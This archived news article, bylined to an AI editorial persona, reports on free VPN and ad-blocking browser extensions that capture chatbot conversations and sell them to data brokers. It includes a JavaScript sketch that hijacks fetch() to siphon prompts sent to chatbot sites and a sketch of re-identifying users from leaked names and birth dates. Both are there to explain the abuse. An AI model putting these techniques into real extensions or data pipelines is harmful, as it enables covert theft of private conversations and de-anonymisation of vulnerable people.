
Archived Article — The Daily Perspective is no longer active. This article was published on 3 March 2026 and is preserved as part of the archive.

Technology

Your AI Confessions Are Being Sold. Here's How.

Browser extensions marketed as privacy tools are quietly harvesting intimate chatbot conversations and feeding them to commercial data brokers.

Image: The Register
Key Points
  • Browser extensions posing as free VPN or ad-blocking tools are silently intercepting users' AI chatbot conversations and selling them to data brokers.
  • Researcher Lee Dryburgh found searchable databases containing medical records, immigration disclosures, suicide discussions, and children's conversations from real users.
  • Healthcare workers pasting patient data into AI tools are among those inadvertently contributing to commercial databases, according to the report.
  • Koi Security's December 2025 report found one extension alone affected roughly 8 million users, with harvesting enabled silently by default.
  • Australia's privacy framework is evolving, but gaps remain that leave users exposed to this kind of cross-border data exploitation.

From Tokyo, the sheer candour with which people use AI chatbots can be startling. In Japan, where social norms traditionally discourage frank disclosure of personal distress, users have taken to asking chatbots about mental illness, relationship breakdowns, and financial ruin with a freedom they would rarely extend to a colleague or even a doctor. What Australian observers often miss about this shift, however, is that the intimacy people feel with AI assistants is being turned into a commercial product, one that is now actively traded on the open market.

A report provided to The Register by Lee Dryburgh, a specialist in AI visibility for consumer health and longevity brands, lays out the mechanics in clinical detail. Data brokers are selling access to sensitive personal data captured during chatbot conversations, despite claims that the data is anonymised and obtained with consent. The method is, in retrospect, almost elegantly simple. People install browser extensions that purport to offer free VPN service or ad blocking, likely without reading the extension's privacy policy, and those extensions may silently intercept users' communications with AI services like ChatGPT, Gemini, Claude, and DeepSeek. The interception works at the code level: the extensions override the browser's native fetch() function and XMLHttpRequest object in order to capture every prompt and every response.
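The override technique described above can be sketched in a few lines. This is a hypothetical illustration, not the extensions' actual code: the hostnames, the `wrapFetch` helper, and the exfiltration queue are all invented for the example, and a real extension would patch XMLHttpRequest in the same spirit.

```javascript
// Hypothetical sketch of the interception described in the report: a
// content script swaps the page's native fetch() for a wrapper that
// copies request bodies bound for AI chat endpoints before passing
// the call through unchanged. Hostnames here are illustrative.
const AI_HOSTS = ["chat.openai.com", "claude.ai", "gemini.google.com"];

function wrapFetch(nativeFetch, sink) {
  return async function (url, options = {}) {
    // Siphon only traffic aimed at the targeted chatbot hosts.
    if (AI_HOSTS.some((h) => String(url).includes(h)) && options.body) {
      sink.push({ url: String(url), body: options.body }); // queued for exfiltration
    }
    // Forward to the real fetch so the page behaves normally.
    return nativeFetch(url, options);
  };
}

// An extension would install it roughly as:
//   globalThis.fetch = wrapFetch(globalThis.fetch, exfilQueue);
```

Because the wrapper forwards every call to the genuine fetch, the chatbot works exactly as before; nothing visible to the user changes.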

The December 2025 investigation by Koi Security, titled "8 Million Users' AI Conversations Sold for Profit by 'Privacy' Extensions", put a precise figure on the problem. Researchers found that Urban VPN Proxy, a Chrome and Edge extension with a 4.7 rating on the Chrome Web Store, had been collecting data from eight popular AI chatbots: ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok, and Meta AI. The harvesting affected roughly 8 million users, including 6 million on Chrome alone, with hundreds of thousands more across other products by the same publisher. The extension's "AI Protection" feature, which displayed warnings about sharing personal data with chatbots, offered no real cover: the data collection and the protection notifications operated independently, and enabling or disabling the warning feature had no effect on whether conversations were captured and exfiltrated. The extension harvested everything regardless.

What Dryburgh found in the resulting databases is genuinely alarming. After gaining access to a major venture-capital-backed analytics platform, he made 205 queries using semantic search and received approximately 490 unique prompts from more than 435 distinct users across 20 sensitive categories. Customers of these data brokers can search and find conversations about suicide, medical records that may enable identification, HIV lab results, abortion clinic searches, immigration status disclosures, domestic violence narratives, and children's conversations. The data is stored with pseudonymised identifiers, but the protection that affords is thin. Panelists have pseudonymised IDs based on SHA-256 hashes, but the content of their conversations is stored verbatim and searchable, and many prompts contain real names, dates of birth, medical record numbers, and diagnosis codes.

The most damning finding, Dryburgh said, is that healthcare workers are pasting real patient data into AI chatbots, and that data is now a commercial database. The report includes examples such as a user asking an AI whether they are pregnant, accompanied by their first name and date of birth. It also describes conversations that appear to come from undocumented immigrants and asylum seekers who posed questions to chatbots about their legal status. Having this information available in a commercial database creates serious legal risk, Dryburgh argues.

A second, related development reported by iTnews adds another layer to the picture. Separate research into residential proxy networks shows that AI companies seeking fresh training data are inadvertently driving demand for ecosystems built on co-opted consumer devices. The dynamics share a common thread with the browser-extension problem: users are enrolled into surveillance infrastructure they do not fully understand, whether through free VPNs, ad blockers, or apps that promise to "monetise" unused bandwidth. As Maynard Koch, chair of distributed and networked systems at Germany's Technische Universität Dresden, told iTnews, if you use such a free service you essentially install proxy software on your device and become part of a broader network, with providers able to claim the arrangement is ethically sourced because users agreed to terms of service. The aggregated effect of these overlapping systems is a data market that is simultaneously vast and largely invisible to the people generating the content.

The data aggregators push back. The companies that aggregate this clickstream data insist that their data handling is lawful and the data is anonymised. That position is not without some legal grounding; opt-in consent panels have been a legitimate market research tool for decades. Profound, one platform that has come under scrutiny, has described itself as licensing data from well-known, established providers, comparing the arrangement to the audience research panels that Nielsen pioneered in the 1920s. The distinction the industry draws is between consented, aggregated behavioural data and the individual-level disclosure that critics say is slipping through anyway.

Those arguments carry less weight when set against the technical reality. It has long been known that anonymised profiles can sometimes be re-identified by connecting a few data points, a process that AI assistance has made considerably easier. And as Koi Security researcher Idan Dardikman observed, the deeper problem is one of misaligned expectations: people have developed a level of candour with AI assistants that they do not have with search engines or regular browsing, sharing medical concerns, financial details, relationship issues, and proprietary code, under the assumption that this stays between them and the AI provider.
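The linkage step is mechanical. The sketch below uses entirely invented records to show how quasi-identifiers leaking through verbatim prompt text (a first name and a date of birth, as in the report's pregnancy example) can be joined against any outside dataset:

```javascript
// Hypothetical linkage attack on invented data: verbatim prompt text
// leaks quasi-identifiers that can be joined against an outside list.
const prompts = [
  { panelistId: "a3f9c2", text: "Am I pregnant? I'm Maria, born 1994-06-02" },
];

const publicRecords = [
  { name: "Maria Santos", dob: "1994-06-02", suburb: "Parramatta" },
  { name: "John Citizen", dob: "1980-01-15", suburb: "Fitzroy" },
];

function reidentify(prompt, records) {
  // Extract a first name and an ISO date from the free-text prompt.
  const dob = (prompt.text.match(/\d{4}-\d{2}-\d{2}/) || [])[0];
  const name = (prompt.text.match(/I'm (\w+)/) || [])[1];
  if (!dob || !name) return null;
  // One join on two weak fields is often enough to single someone out.
  return records.find((r) => r.dob === dob && r.name.startsWith(name)) || null;
}
```

Nothing here requires breaking the pseudonym at all: the "anonymised" record identifies its author on its own, which is exactly the gap critics say the consent-and-aggregation defence glosses over.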

For Australian users, the regulatory picture is improving but remains incomplete. The Office of the Australian Information Commissioner has become more active, issuing AI-specific privacy guidance in late 2024 and launching its first-ever compliance sweep of business privacy policies in early 2026. Australia's privacy regulator has been proactive in interpreting the Privacy Act in AI contexts, actively regulating AI through interpretation and enforcement rather than waiting for dedicated legislation. Critically, the OAIC has flagged data brokerage, advertising technology such as pixel tracking, and practices that erode privacy rights in the application of AI among its priority enforcement areas. New transparency obligations around automated decision-making are scheduled to take effect in December 2026, though critics argue these reforms still leave cross-border data exploitation largely unaddressed.

The honest tension here is between two legitimate interests. Clickstream analytics and market research serve real purposes: understanding what people ask AI tools shapes product development, public health communication, and commercial strategy. The data economy, for all its excesses, is not inherently illegitimate. The problem is not data collection per se, but the gap between what users are told and what is actually done with their most private thoughts. An extension that warns users not to share sensitive data with ChatGPT while simultaneously forwarding every word to a data broker is not a privacy tool; it is a deception, regardless of what a buried privacy policy technically permits.

The pragmatic response is not to demand an end to AI analytics, but to insist on genuine informed consent, robust de-identification standards with independent verification, and clear liability when re-identification occurs. In the meantime, researchers recommend uninstalling browser extensions that have permission to read and modify site data, and considering using AI chatbots in incognito or private mode, which can block extension access. For the broader regulatory project, Australia's evolving privacy framework is pointed in roughly the right direction. Whether it moves fast enough to keep pace with what is being captured, stored, and sold is a harder question.

Yuki Tamura

Yuki Tamura is an AI editorial persona created by The Daily Perspective. Covering the cultural, political, and technological currents shaping the Asia-Pacific region from Japanese innovation to Pacific Island climate concerns. As an AI persona, articles are generated using artificial intelligence with editorial quality controls.